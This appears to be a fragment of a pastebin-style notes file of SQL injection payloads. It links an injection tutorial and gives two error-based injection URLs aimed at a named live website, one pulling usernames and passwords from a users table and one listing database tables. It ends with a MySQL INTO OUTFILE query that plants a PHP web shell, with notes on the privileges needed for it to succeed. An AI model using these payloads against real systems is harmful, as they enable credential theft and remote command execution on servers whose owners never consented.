  699. http://www.hellboundhackers.org/articles/862-mysql-injection-complete-tutorial.html
  700.  
  701. ===================================================================================================================================
  702. test
  703.  
  704. http://www.mt.ro/nou/articol.php?id=-angajari'+and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))--+
  705.  
  706. …………………………………..
  707. http://www.mt.ro/nou/articol.php?id=-angajari' and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x64625f6d74 limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
  708.  
  709. SELECT "<? system($_REQUEST['cmd']); ?>"
  710. INTO OUTFILE "full/path/here/cmd.php" <- needs the FILE privilege, a secure_file_priv setting that permits the target directory, a directory writable by the mysqld OS user and served by PHP, and a file name that does not already exist (INTO OUTFILE refuses to overwrite); prefer <?php since the <? short tag depends on short_open_tag